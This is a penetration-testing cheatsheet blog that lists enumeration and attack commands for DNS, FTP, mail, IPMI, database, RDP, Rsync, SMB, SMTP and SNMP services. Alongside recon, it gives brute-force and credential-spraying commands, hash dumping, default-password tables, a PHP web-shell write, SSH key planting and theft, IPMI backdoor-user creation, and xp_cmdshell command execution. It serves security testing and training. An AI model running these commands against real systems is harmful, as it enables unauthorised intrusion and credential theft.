Footprinting on d3vilsec

DNS

Mon, 01 Jan 0001 00:00:00 +0000

DNS Enumeration Cheatsheet

Default Port: 53 (TCP/UDP)

Key DNS Record Types

Record	Description
A	IPv4 address
AAAA	IPv6 address
MX	Mail server
NS	Name server
TXT	Text records (SPF, DMARC, verification)
CNAME	Canonical name / alias
SOA	Start of authority
PTR	Reverse lookup
SRV	Service location

Basic Lookups

# host
host <domain>
host -t A <domain>
host -t MX <domain>
host -t NS <domain>
host -t TXT <domain>
host -t CNAME <domain>

# dig
dig <domain>
dig <domain> ANY
dig <domain> A
dig <domain> MX
dig <domain> NS
dig <domain> TXT
dig @<nameserver> <domain> ANY +noall +answer

# nslookup
nslookup <domain>
nslookup -type=MX <domain>
nslookup -type=NS <domain>

Zone Transfer

dig axfr @<nameserver> <domain>
host -l <domain> <nameserver>
fierce --domain <domain>

Subdomain Enumeration

# dnsenum
dnsenum --dnsserver <ns> --enum -p 0 -s 0 -o output.txt -f wordlist.txt <domain>
dnsenum --enum inlanefreight.htb -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r

# dnsrecon
dnsrecon -d <domain> -t std                        # Standard enumeration
dnsrecon -d <domain> -t axfr                       # Zone transfer attempt
dnsrecon -d <domain> -t brt -D wordlist.txt        # Brute force subdomains

# gobuster DNS mode
gobuster dns -d <domain> -w wordlist.txt -r <nameserver>

# Sublist3r
sublist3r -d <domain>

# Amass
amass enum -d <domain>
amass enum -passive -d <domain>

Nmap DNS Scripts

nmap -p 53 --script dns-brute <domain>
nmap -p 53 --script dns-zone-transfer \
  --script-args dns-zone-transfer.domain=<domain> <nameserver>
nmap -p 53 --script dns-nsid <nameserver>
nmap -p 53 --script dns-recursion <nameserver>
nmap -p 53 --script dns-cache-snoop <nameserver>

Reverse DNS Lookup

dig -x <ip>
host <ip>
dnsrecon -r <cidr> -t rvl

# Example
dig -x 192.168.1.1
host 192.168.1.1

Wordlists (SecLists)

/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
/usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt

FTP

Mon, 01 Jan 0001 00:00:00 +0000

FTP Enumeration Cheatsheet

Default Ports: 21 (control), 20 (data - active mode)

nc -nv <ip> 21
telnet <ip> 21
ftp <ip>
openssl s_client -connect <ip>:21 -starttls ftp    # FTPS

ftp <ip>
# Username: anonymous
# Password: anonymous  (or leave blank)

# Via curl
curl -v ftp://<ip>/ --user anonymous:anonymous
curl -v ftp://<ip>/<path>/ --user anonymous:anonymous

FTP Commands (Once Connected)

USER <username>          # Send username
PASS <password>          # Send password
SYST                     # Display system type
STAT                     # Status / verbose file listing
LIST                     # List files (verbose)
NLST                     # Name list (simple)
PWD                      # Print working directory
CWD <dir>                # Change directory
GET <file>               # Download file
PUT <file>               # Upload file
MGET *                   # Download all files
BINARY                   # Switch to binary transfer mode
ASCII                    # Switch to ASCII transfer mode
PASV                     # Enter passive mode
QUIT                     # Disconnect

Nmap FTP Scripts

nmap -p 21 --script ftp-anon <ip>             # Check anonymous login
nmap -p 21 --script ftp-banner <ip>           # Banner grab
nmap -p 21 --script ftp-brute <ip>            # Brute force credentials
nmap -p 21 --script ftp-bounce <ip>           # FTP bounce attack check
nmap -p 21 --script ftp-syst <ip>             # SYST command response
nmap -p 21 --script ftp-vsftpd-backdoor <ip>  # vsFTPd 2.3.4 backdoor check
nmap -p 21 -sV --script ftp-* <ip>            # Run all FTP scripts

Brute Force

hydra -l <user> -P wordlist.txt ftp://<ip>
hydra -L users.txt -P wordlist.txt ftp://<ip>
medusa -u <user> -P wordlist.txt -h <ip> -M ftp

Bulk Download

# wget recursive download (no passive mode)
wget -m --no-passive ftp://anonymous:anonymous@<ip>

# curl recursive
curl -s ftp://<ip>/ --user anonymous:anonymous | awk '{print $NF}' | \
  while read f; do curl -s ftp://<ip>/$f --user anonymous:anonymous -O; done

Key Vulnerabilities

Software	CVE	Description
vsFTPd 2.3.4	CVE-2011-2523	Backdoor shell on port 6200
ProFTPd 1.3.5	CVE-2015-3306	mod_copy unauthenticated file copy
ProFTPd 1.3.3c	CVE-2010-4221	Remote heap overflow

IMAP POP3

Mon, 01 Jan 0001 00:00:00 +0000

IMAP / POP3 Enumeration Cheatsheet

Default Ports:

IMAP: 143 (plain), 993 (SSL/TLS)
POP3: 110 (plain), 995 (SSL/TLS)

nc -nv <ip> 110                              # POP3
nc -nv <ip> 143                              # IMAP
openssl s_client -connect <ip>:993           # IMAPS
openssl s_client -connect <ip>:995           # POP3S
openssl s_client -connect <ip>:143 -starttls imap   # STARTTLS IMAP

POP3 Commands (Manual)

USER <username>
PASS <password>
STAT                    # Mailbox stats (message count, total size)
LIST                    # List all messages with sizes
LIST <n>                # Info for message n
RETR <n>                # Retrieve (download) message n
DELE <n>                # Mark message n for deletion
TOP <n> <lines>         # Retrieve headers + first N lines of message n
UIDL                    # Unique ID listing for all messages
NOOP                    # Keep-alive
RSET                    # Unmark any deletions
QUIT                    # Commit deletes and disconnect

IMAP Commands (Manual)

a LOGIN <user> <pass>
a CAPABILITY                         # Show server capabilities
a LIST "" "*"                        # List all mailboxes
a SELECT INBOX                       # Select inbox
a STATUS INBOX (MESSAGES UNSEEN)     # Inbox stats
a FETCH 1:* (FLAGS)                  # List messages with flags
a FETCH 1 (BODY[])                   # Download full message 1
a FETCH 1 (BODY[HEADER])             # Headers only
a FETCH 1 (BODY[TEXT])               # Body only
a SEARCH ALL                         # Search all messages
a SEARCH UNSEEN                      # Search unread messages
a EXAMINE INBOX                      # Read-only select
a LOGOUT

Nmap Scripts

nmap -p 110,143,993,995 --script imap-capabilities <ip>
nmap -p 110,143,993,995 --script pop3-capabilities <ip>
nmap -p 110 --script pop3-brute <ip>
nmap -p 143 --script imap-brute <ip>
nmap -p 993,995 --script imap-ntlm-info <ip>    # Windows NTLM info leak

Brute Force

hydra -l <user> -P wordlist.txt imap://<ip>
hydra -l <user> -P wordlist.txt pop3://<ip>
hydra -l <user> -P wordlist.txt -s 993 -S imap://<ip>    # IMAPS
hydra -l <user> -P wordlist.txt -s 995 -S pop3://<ip>    # POP3S

curl Mail Access

# List mailboxes
curl -k 'imaps://<ip>' --user <user>:<pass>

# List INBOX contents
curl -k 'imaps://<ip>/INBOX' --user <user>:<pass>

# Read specific message
curl -k 'imaps://<ip>/INBOX;MAILINDEX=1' --user <user>:<pass>

# POP3 via curl
curl -k 'pop3s://<ip>' --user <user>:<pass>
curl -k 'pop3s://<ip>/1' --user <user>:<pass>    # Download message 1

IPMI

Mon, 01 Jan 0001 00:00:00 +0000

IPMI Enumeration Cheatsheet

Default Port: 623 (UDP)

What is IPMI? Intelligent Platform Management Interface — out-of-band management for servers (iDRAC, iLO, BMC). Can give full remote control even if OS is down.

Detection & Version

nmap -sU -p 623 <ip>
nmap -sU -p 623 --script ipmi-version <ip>

Nmap Scripts

nmap -sU -p 623 --script ipmi-version <ip>
nmap -sU -p 623 --script ipmi-cipher-zero <ip>    # Check for Cipher 0 auth bypass

Metasploit Modules

# Version detection
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS <ip>
run

# Dump RAKP hashes (no auth needed)
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <ip>
run

# Cipher 0 auth bypass (unauthenticated admin access)
use auxiliary/scanner/ipmi/ipmi_cipher_zero
set RHOSTS <ip>
run

ipmitool (Direct Interaction)

# Version/status
ipmitool -I lanplus -H <ip> -U admin -P admin chassis status

# List users
ipmitool -I lanplus -H <ip> -U admin -P admin user list

# LAN config
ipmitool -I lanplus -H <ip> -U admin -P admin lan print

# Power control
ipmitool -I lanplus -H <ip> -U admin -P admin power status
ipmitool -I lanplus -H <ip> -U admin -P admin power reset

# Add user (post-compromise)
ipmitool -I lanplus -H <ip> -U admin -P admin user set name 4 hacker
ipmitool -I lanplus -H <ip> -U admin -P admin user set password 4 Password1
ipmitool -I lanplus -H <ip> -U admin -P admin user priv 4 4      # Admin priv
ipmitool -I lanplus -H <ip> -U admin -P admin user enable 4

Hash Cracking (After RAKP Dump)

# Hashcat mode 7300 = IPMI2 RAKP HMAC-SHA1
hashcat -m 7300 hashes.txt wordlist.txt
hashcat -m 7300 hashes.txt wordlist.txt -r rules/best64.rule

Default Credentials

Vendor / Interface	Username	Default Password
Dell iDRAC	root	calvin
HP iLO	Administrator	(printed on pull tab)
Supermicro IPMI	ADMIN	ADMIN
IBM IMM	USERID	PASSW0RD
Cisco CIMC	admin	password
Intel RMM	admin	(blank)

Key Vulnerabilities

Issue	Description
Cipher 0	Allows unauthenticated auth bypass — attacker can set any password
RAKP hash dump	IPMI spec allows anyone to request auth hash → offline crack
Default creds	Most systems ship with known default credentials
Anonymous auth	Some BMCs allow completely anonymous access

MSSQL

Mon, 01 Jan 0001 00:00:00 +0000

MSSQL Enumeration Cheatsheet

Default Ports: 1433 (TCP), 1434 (UDP — SQL Server Browser)

Discovery & Nmap Scripts

nmap -p 1433 --script ms-sql-info <ip>
nmap -p 1433 --script ms-sql-config <ip>
nmap -p 1433 --script ms-sql-empty-password <ip>
nmap -p 1433 --script ms-sql-brute <ip>
nmap -sU -p 1434 --script ms-sql-dac <ip>     # Discover dynamic ports via UDP
nmap -p 1433 --script ms-sql-* <ip>            # All MSSQL scripts

Metasploit Modules

use auxiliary/scanner/mssql/mssql_ping        # Discovery + version
use auxiliary/scanner/mssql/mssql_login       # Brute force auth
use auxiliary/admin/mssql/mssql_sql           # Execute SQL query
use auxiliary/admin/mssql/mssql_exec          # OS command execution (xp_cmdshell)
use auxiliary/admin/mssql/mssql_enum          # Full enumeration
use auxiliary/admin/mssql/mssql_enum_sql_logins  # Enumerate SQL logins

mssqlclient.py (impacket)

# Connect with SQL auth
python3 mssqlclient.py <user>:<pass>@<ip>

# Connect with Windows auth
python3 mssqlclient.py <domain>/<user>:<pass>@<ip> -windows-auth

# Connect with hash (Pass-the-Hash)
python3 mssqlclient.py <domain>/<user>@<ip> -hashes :<nthash> -windows-auth

Useful SQL Queries

-- Version and user info
SELECT @@version;
SELECT system_user;
SELECT user_name();
SELECT DB_NAME();

-- Check if sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
SELECT IS_MEMBER('db_owner');

-- List databases
SELECT name FROM sys.databases;
USE <database>;
SELECT table_name FROM information_schema.tables;

-- List users and roles
SELECT name, type_desc FROM sys.server_principals;
SELECT name FROM sys.syslogins;
SELECT roles.name FROM sys.server_role_members
  JOIN sys.server_principals AS roles ON roles.principal_id = server_role_members.role_principal_id
  JOIN sys.server_principals AS members ON members.principal_id = server_role_members.member_principal_id
  WHERE members.name = '<user>';

xp_cmdshell (OS Command Execution)

-- Enable xp_cmdshell (requires sysadmin)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Run commands
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'net user';
EXEC xp_cmdshell 'powershell -enc <base64payload>';

Linked Servers (Lateral Movement)

-- Enumerate linked servers
SELECT * FROM sys.servers;
EXEC sp_linkedservers;

-- Execute query on linked server
EXECUTE('SELECT @@version') AT [<linked_server>];
EXECUTE('SELECT system_user') AT [<linked_server>];

-- Execute OS command via linked server
EXECUTE('EXEC xp_cmdshell ''whoami''') AT [<linked_server>];

Brute Force

hydra -l sa -P wordlist.txt mssql://<ip>
medusa -h <ip> -u sa -P wordlist.txt -M mssql
crackmapexec mssql <ip> -u <user> -p wordlist.txt

File Read / Write

-- Read file (via BULK INSERT or OPENROWSET)
SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS t;

-- Write file (via xp_cmdshell)
EXEC xp_cmdshell 'echo hacked > C:\inetpub\wwwroot\shell.txt';

MySQL

Mon, 01 Jan 0001 00:00:00 +0000

MySQL Enumeration Cheatsheet

Default Port: 3306 (TCP)

nc -nv <ip> 3306                             # Banner grab
mysql -u root -h <ip>                        # No password
mysql -u root -p -h <ip>                     # Prompt for password
mysql -u root -p<password> -h <ip>           # Inline password (no space)
mysql -u root -h <ip> -e "SELECT version();" # One-liner query

Nmap Scripts

nmap -p 3306 --script mysql-info <ip>
nmap -p 3306 --script mysql-databases \
  --script-args mysqluser=root,mysqlpass='' <ip>
nmap -p 3306 --script mysql-empty-password <ip>
nmap -p 3306 --script mysql-brute <ip>
nmap -p 3306 --script mysql-audit <ip>
nmap -p 3306 --script mysql-vuln-cve2012-2122 <ip>
nmap -p 3306 --script mysql-* <ip>             # All MySQL scripts

Enumeration Queries

-- Version and environment
SELECT version();
SELECT @@version;
SELECT user();
SELECT @@datadir;
SELECT @@basedir;
SELECT @@hostname;

-- Databases and tables
SHOW databases;
USE <database>;
SHOW tables;
DESCRIBE <table>;
SELECT * FROM <table> LIMIT 5;
SELECT table_schema, table_name FROM information_schema.tables;

-- Users and privileges
SELECT user, host, authentication_string FROM mysql.user;
SELECT user, host, password FROM mysql.user;         -- older MySQL
SELECT * FROM information_schema.user_privileges;
SHOW GRANTS FOR '<user>'@'<host>';
SHOW GRANTS FOR CURRENT_USER();

-- Check FILE privilege
SELECT user, host, File_priv FROM mysql.user;

File Read / Write (Requires FILE Privilege)

-- Read files
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/etc/shadow');
SELECT LOAD_FILE('C:/Windows/System32/drivers/etc/hosts');

-- Write files (web shell)
SELECT '<?php system($_GET["cmd"]); ?>'
  INTO OUTFILE '/var/www/html/shell.php';

-- Write SSH key
SELECT 'ssh-rsa AAAA...' INTO OUTFILE '/root/.ssh/authorized_keys';

Brute Force

hydra -l root -P wordlist.txt mysql://<ip>
hydra -L users.txt -P wordlist.txt mysql://<ip>
medusa -h <ip> -u root -P wordlist.txt -M mysql

User-Defined Functions (UDF) for Privilege Escalation

-- Check if plugin dir is writable (post-login)
SHOW variables LIKE 'plugin_dir';

-- Drop malicious UDF .so/.dll into plugin dir,
-- then create the function and execute OS commands
CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id > /tmp/out');

Common Credentials to Try

root : (blank)
root : root
root : password
root : mysql
root : toor
admin : admin

Oracle TNS

Mon, 01 Jan 0001 00:00:00 +0000

Oracle TNS Enumeration Cheatsheet

Default Port: 1521 (TCP)

Nmap Scripts

nmap -p 1521 --script oracle-tns-version <ip>
nmap -p 1521 --script oracle-sid-brute <ip>
nmap -p 1521 --script oracle-brute <ip>
nmap -p 1521 --script oracle-brute-stealth <ip>
nmap -p 1521 --script oracle-enum-users \
  --script-args oracle-enum-users.sid=<sid> <ip>

ODAT (Oracle Database Attacking Tool)

# Full automated scan
odat all -s <ip> -p 1521

# SID brute force
odat sidguesser -s <ip> -p 1521

# Password brute force (after getting SID)
odat passwordguesser -s <ip> -p 1521 -d <sid>

# File read/write (requires UTL_FILE privilege)
odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd /tmp/passwd.txt
odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --putFile /tmp shell.php shell.php

# OS command execution (requires Java)
odat java -s <ip> -d <sid> -U <user> -P <pass> --exec "whoami"

# External table method for file read
odat externaltable -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd

sqlplus (Direct Connection)

# Install: sudo apt install oracle-instantclient-sqlplus

# Connect
sqlplus <user>/<pass>@<ip>:<port>/<sid>
sqlplus <user>/<pass>@<ip>:<port>/<sid> as sysdba
sqlplus <user>/<pass>@//<ip>:<port>/<service_name>

Common SIDs to Try

XE          ORCL        DB          DATABASE
PROD        TEST        DEV         ORACLE
OEMREP      ORACLR_CONNECTION_DATA

Enumeration Queries (Once Connected)

-- Version and user
SELECT * FROM v$version;
SELECT user FROM dual;
SELECT * FROM session_privs;

-- Database objects
SELECT * FROM all_tables;
SELECT owner, table_name FROM all_tables WHERE owner != 'SYS';
SELECT column_name, data_type FROM all_tab_columns WHERE table_name = '<TABLE>';

-- Users and privileges
SELECT username FROM dba_users;
SELECT * FROM user_role_privs;
SELECT * FROM dba_sys_privs WHERE grantee = '<user>';

-- Password hashes (as SYSDBA)
SELECT name, password FROM sys.user$;
SELECT name, spare4 FROM sys.user$;    -- SHA-1 hashes (11g+)

-- Check for DBA role
SELECT * FROM session_privs WHERE privilege = 'CREATE SESSION';

Privilege Escalation via Java

-- Grant Java permissions (as DBA)
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');

-- Execute OS command via Java
SELECT dbms_java.runjava('oracle/aurora/util/Wrapper /bin/bash -c "id > /tmp/out"') FROM dual;

Brute Force

hydra -l <user> -P wordlist.txt -s 1521 oracle://<ip>/<sid>
nmap -p 1521 --script oracle-brute \
  --script-args oracle-brute.sid=<sid> <ip>

Default Credentials

Username	Password	Notes
sys	change_on_install	sysdba
system	manager
scott	tiger	Classic demo user
dbsnmp	dbsnmp	SNMP agent
mdsys	mdsys
hr	hr

R Services

Mon, 01 Jan 0001 00:00:00 +0000

R-Services Enumeration Cheatsheet

Default Ports:

rexec: 512 (TCP)
rlogin: 513 (TCP)
rsh / rcp: 514 (TCP)
rpcbind / portmapper: 111 (TCP/UDP)

Note: R-services transmit data in cleartext and rely on IP-based trust. They are largely obsolete but still found in legacy Unix/Linux environments.

Detection

nmap -p 512-514 <ip>
nmap -p 512-514 -sV <ip>
nmap -p 111 <ip>

rlogin

# Login as current user
rlogin <ip>

# Login as specific user
rlogin -l <user> <ip>

rsh (Remote Shell)

# Execute command remotely
rsh <ip> <command>
rsh -l <user> <ip> whoami
rsh -l <user> <ip> cat /etc/passwd
rsh -l <user> <ip> /bin/bash

rexec (Remote Exec)

rexec <ip> -l <user> <command>
rexec <ip> -l <user> id

rpcbind / Portmapper (Port 111)

# List all registered RPC services
rpcinfo -p <ip>

# List NFS mounts (if NFS is running)
showmount -e <ip>

# Nmap
nmap -p 111 --script rpcinfo <ip>
nmap -p 111 --script nfs-ls <ip>
nmap -p 111 --script nfs-showmount <ip>
nmap -p 111 --script nfs-statfs <ip>

rwho / ruptime

# List logged-in users across trusted hosts
rwho

# Show uptime across trusted hosts
ruptime

Trust Files (Critical Targets)

These files define which hosts/users can connect without a password:

RDP

Mon, 01 Jan 0001 00:00:00 +0000

RDP Enumeration Cheatsheet

Default Port: 3389 (TCP)

Detection & Info Gathering

nmap -p 3389 -sV <ip>
nmap -p 3389 --script rdp-enum-encryption <ip>
nmap -p 3389 --script rdp-vuln-ms12-020 <ip>
nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020,rdp-ntlm-info <ip>

Check NLA (Network Level Auth)

# If NLA is required, credential prompt appears BEFORE full connection
nmap -p 3389 --script rdp-enum-encryption <ip>
# Look for: "Security layer: NLA" or "CredSSP"

# rdp_check.py (impacket) — tests credential validity
python3 rdp_check.py <domain>/<user>:<pass>@<ip>

Password Attacks

# Hydra
hydra -l <user> -P wordlist.txt rdp://<ip>
hydra -L users.txt -P wordlist.txt rdp://<ip>
hydra -l <user> -P wordlist.txt rdp://<ip> -t 4    # Limit threads (RDP is picky)

# Crowbar
crowbar -b rdp -s <ip>/32 -u <user> -C wordlist.txt
crowbar -b rdp -s 192.168.1.0/24 -U users.txt -C wordlist.txt

# Metasploit
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <ip>
run

Connecting via Linux

# xfreerdp (recommended)
xfreerdp /u:<user> /p:<pass> /v:<ip>
xfreerdp /u:<user> /p:<pass> /v:<ip> /d:<domain>
xfreerdp /u:<user> /p:<pass> /v:<ip> /drive:share,/tmp    # Mount local dir
xfreerdp /u:<user> /p:<pass> /v:<ip> /cert-ignore          # Ignore cert errors
xfreerdp /u:<user> /h:<nthash> /v:<ip>                     # Pass-the-Hash

# rdesktop
rdesktop <ip>
rdesktop -u <user> -p <pass> -d <domain> <ip>

# Remmina (GUI)
remmina -c rdp://<user>@<ip>

Session Hijacking (Post-Exploitation)

# List sessions (on Windows target)
query session
query user

# Hijack disconnected session (as SYSTEM)
tscon <session_id> /dest:<current_session>

Key Vulnerabilities

CVE	Name	Affected Systems	Description
CVE-2019-0708	BlueKeep	Win7, WinXP, Server 2008	Pre-auth RCE via RDP
CVE-2019-1181	DejaBlue	Win8, Win10, Server 2012+	Pre-auth RCE via RDP
CVE-2019-1182	DejaBlue	Win8, Win10, Server 2012+	Pre-auth RCE via RDP
CVE-2012-0002	MS12-020	Multiple	DoS / potential code execution

BlueKeep Check (Metasploit)

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <ip>
run

Useful Options

# Custom RDP port
xfreerdp /u:<user> /p:<pass> /v:<ip>:<port>

# Enable clipboard sharing
xfreerdp /u:<user> /p:<pass> /v:<ip> +clipboard

# Full screen
xfreerdp /u:<user> /p:<pass> /v:<ip> /f

# Dynamic resolution
xfreerdp /u:<user> /p:<pass> /v:<ip> /dynamic-resolution

Rsync

Mon, 01 Jan 0001 00:00:00 +0000

Rsync Enumeration Cheatsheet

Default Port: 873 (TCP)

Detection

nmap -p 873 <ip>
nmap -p 873 -sV <ip>
nmap -p 873 --script rsync-list-modules <ip>
nc -nv <ip> 873

List Available Modules (Shares)

# List modules (no auth)
rsync -av --list-only rsync://<ip>/
rsync rsync://<ip>/

# nc banner grab
nc -nv <ip> 873
# Then type: #list

Enumerate Files in a Module

rsync -av --list-only rsync://<ip>/<module>/
rsync -av --list-only rsync://<ip>/<module>/subdir/

# Recursive listing of entire module
rsync -r --list-only rsync://<ip>/<module>/

Download Files

# Download single file
rsync rsync://<ip>/<module>/file.txt ./

# Download entire module
rsync -av rsync://<ip>/<module>/ ./local_copy/

# With credentials
rsync -av rsync://<user>@<ip>/<module>/ ./
rsync --password-file=pass.txt rsync://<user>@<ip>/<module>/ ./

# Dry run (see what would be downloaded)
rsync -av --dry-run rsync://<ip>/<module>/ ./

Upload Files

# Upload single file
rsync -av ./shell.php rsync://<user>@<ip>/<module>/

# Upload directory
rsync -av ./payload/ rsync://<user>@<ip>/<module>/uploads/

# With password file
rsync --password-file=pass.txt -av ./file rsync://<user>@<ip>/<module>/

High-Value Paths to Check

rsync -av --list-only rsync://<ip>/home/
rsync -av --list-only rsync://<ip>/root/
rsync -av --list-only rsync://<ip>/etc/
rsync -av --list-only rsync://<ip>/backup/
rsync -av --list-only rsync://<ip>/var/www/
rsync -av --list-only rsync://<ip>/.ssh/

SSH Key Theft & Planting

# Download .ssh directory
rsync -av rsync://<ip>/home/<user>/.ssh/ ./stolen_keys/

# Plant authorized_keys (if write access)
rsync -av ~/.ssh/id_rsa.pub rsync://<user>@<ip>/home/<user>/.ssh/authorized_keys

Nmap Scripts

nmap -p 873 --script rsync-list-modules <ip>

SMB

Mon, 01 Jan 0001 00:00:00 +0000

SMB Enumeration Cheatsheet

Default Ports: 445 (TCP), 139 (TCP/NetBIOS), 137–138 (UDP)

Initial Scanning

nmap -p 139,445 -sV <ip>
nmap -p 445 --script smb-os-discovery <ip>
nmap -p 445 --script smb-security-mode <ip>
nmap -p 445 --script smb2-security-mode <ip>
nmap -p 139,445 --script smb-* <ip>              # All SMB scripts
nmap -p 445 --script smb-vuln-* <ip>             # All vuln checks

NetBIOS / NBT Scanning

nbtscan <ip>
nbtscan -r 192.168.1.0/24
nmblookup -A <ip>

enum4linux / enum4linux-ng

# Classic
enum4linux -a <ip>                               # All checks
enum4linux -u <user> -p <pass> <ip>              # Authenticated
enum4linux -S <ip>                               # Shares only
enum4linux -U <ip>                               # Users only
enum4linux -P <ip>                               # Password policy

# Newer (recommended)
enum4linux-ng -A <ip>
enum4linux-ng -A <ip> -u <user> -p <pass>
enum4linux-ng -A <ip> -oA output

smbclient

# List shares
smbclient -L //<ip>/ -N                          # Null session
smbclient -L //<ip>/ -U <user>%<pass>            # Authenticated

# Connect to share
smbclient //<ip>/<share> -N
smbclient //<ip>/<share> -U <user>%<pass>
smbclient //<ip>/<share> -U <domain>/<user>%<pass>

# Within smbclient shell
ls                    # List files
cd <dir>              # Change directory
get <file>            # Download file
put <file>            # Upload file
recurse ON            # Enable recursive operations
prompt OFF            # Disable prompts
mget *                # Download everything
mput *                # Upload everything

CrackMapExec (CME)

# Basic info
crackmapexec smb <ip>
crackmapexec smb 192.168.1.0/24

# Authenticated enum
crackmapexec smb <ip> -u <user> -p <pass>
crackmapexec smb <ip> -u <user> -p <pass> --shares
crackmapexec smb <ip> -u <user> -p <pass> --users
crackmapexec smb <ip> -u <user> -p <pass> --groups
crackmapexec smb <ip> -u <user> -p <pass> --sessions
crackmapexec smb <ip> -u <user> -p <pass> --loggedon-users
crackmapexec smb <ip> -u <user> -p <pass> --local-groups

# Credential spraying
crackmapexec smb 192.168.1.0/24 -u <user> -p <pass> --continue-on-success

# Pass-the-Hash
crackmapexec smb <ip> -u <user> -H <nthash>

# Command execution
crackmapexec smb <ip> -u <user> -p <pass> -x 'whoami'       # CMD
crackmapexec smb <ip> -u <user> -p <pass> -X 'whoami'       # PowerShell

# Dump SAM/LSA
crackmapexec smb <ip> -u <user> -p <pass> --sam
crackmapexec smb <ip> -u <user> -p <pass> --lsa
crackmapexec smb <ip> -u <user> -p <pass> -M ntdsutil       # NTDS.dit

impacket Tools

python3 smbclient.py <domain>/<user>:<pass>@<ip>
python3 samrdump.py <domain>/<user>:<pass>@<ip>
python3 rpcdump.py <domain>/<user>:<pass>@<ip>
python3 lookupsid.py <domain>/<user>:<pass>@<ip>
python3 secretsdump.py <domain>/<user>:<pass>@<ip>      # Dump all hashes
python3 secretsdump.py -just-dc-ntlm <domain>/<user>:<pass>@<ip>

Mounting SMB Shares

# Linux mount
sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass>
sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass>,domain=<domain>

Key Vulnerabilities

CVE	Name	Description
CVE-2017-0144	EternalBlue / MS17-010	SMBv1 RCE — WannaCry / NotPetya
CVE-2020-0796	SMBGhost	SMBv3.1.1 compression RCE
CVE-2021-34527	PrintNightmare	Print Spooler RCE via SMB

# EternalBlue check
nmap -p 445 --script smb-vuln-ms17-010 <ip>
use auxiliary/scanner/smb/smb_ms17_010

# SMBGhost check
nmap -p 445 --script smb-vuln-cve2020-0796 <ip>
use auxiliary/scanner/smb/cve_2020_0796_smbghost

SMTP

Mon, 01 Jan 0001 00:00:00 +0000

SMTP Enumeration Cheatsheet

Default Ports: 25 (SMTP), 587 (Submission/STARTTLS), 465 (SMTPS)

nc -nv <ip> 25
telnet <ip> 25
openssl s_client -starttls smtp -connect <ip>:587
openssl s_client -connect <ip>:465

Manual SMTP Commands

HELO <domain>                   # Basic hello
EHLO <domain>                   # Extended hello (lists capabilities)
AUTH LOGIN                      # Start base64 auth
AUTH PLAIN                      # Plain auth
VRFY <user>                     # Verify if user exists
EXPN <list>                     # Expand mailing list members
RCPT TO:<user@domain>           # Verify recipient (within MAIL flow)
MAIL FROM:<attacker@test.com>
RCPT TO:<target@domain>
DATA                            # Begin message body
.                               # End message (single dot on its own line)
RSET                            # Reset connection state
QUIT

Capabilities Enumeration

# See what the server supports after EHLO
nc <ip> 25
EHLO test.com

# Common capabilities to note:
# STARTTLS, AUTH LOGIN/PLAIN/NTLM, SIZE, PIPELINING, VRFY, EXPN

User Enumeration

# smtp-user-enum tool
smtp-user-enum -M VRFY -U users.txt -t <ip>
smtp-user-enum -M EXPN -U users.txt -t <ip>
smtp-user-enum -M RCPT -U users.txt -t <ip> -D <domain>

# Manual VRFY loop
for user in $(cat users.txt); do
  echo VRFY $user | nc -nv -w 1 <ip> 25 2>/dev/null | grep "^250"
done

# Response codes:
# 250 = user exists
# 252 = can't verify but will attempt delivery
# 550 = user does not exist

Nmap Scripts

nmap -p 25 --script smtp-commands <ip>
nmap -p 25 --script smtp-enum-users <ip>
nmap -p 25 --script smtp-open-relay <ip>
nmap -p 25 --script smtp-brute <ip>
nmap -p 25 --script smtp-ntlm-info <ip>          # Windows NTLM info leak
nmap -p 25 --script smtp-vuln-cve2010-4344 <ip>  # Exim heap overflow
nmap -p 25,587,465 --script smtp-* <ip>

Open Relay Testing

nc <ip> 25
EHLO test.com
MAIL FROM:<attacker@attacker.com>
RCPT TO:<victim@external-domain.com>    # If accepted = open relay!
DATA
Subject: relay test
This is a test.
.
QUIT

# Automated
nmap -p 25 --script smtp-open-relay \
  --script-args smtp-open-relay.from=sender@test.com,smtp-open-relay.to=victim@gmail.com <ip>

Metasploit

use auxiliary/scanner/smtp/smtp_version
use auxiliary/scanner/smtp/smtp_enum
use auxiliary/scanner/smtp/smtp_relay

NTLM Info Leak (Windows SMTP)

# Triggers Windows SMTP servers to reveal hostname, domain, OS version
nmap -p 25 --script smtp-ntlm-info <ip>

# Manual
nc <ip> 25
EHLO test
AUTH NTLM
TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
# Decode the Base64 response with ntlmdecoder or responder

Useful Wordlists

/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

SNMP

Mon, 01 Jan 0001 00:00:00 +0000

SNMP Enumeration Cheatsheet

Default Ports: 161 (UDP — queries), 162 (UDP — traps)

SNMP Versions

Version	Auth	Notes
v1	Community string	Cleartext, oldest
v2c	Community string	Cleartext, most common
v3	Username + auth + encryption	Secure, rarely misconfigured

Detection

nmap -sU -p 161 <ip>
nmap -sU -p 161 -sV <ip>
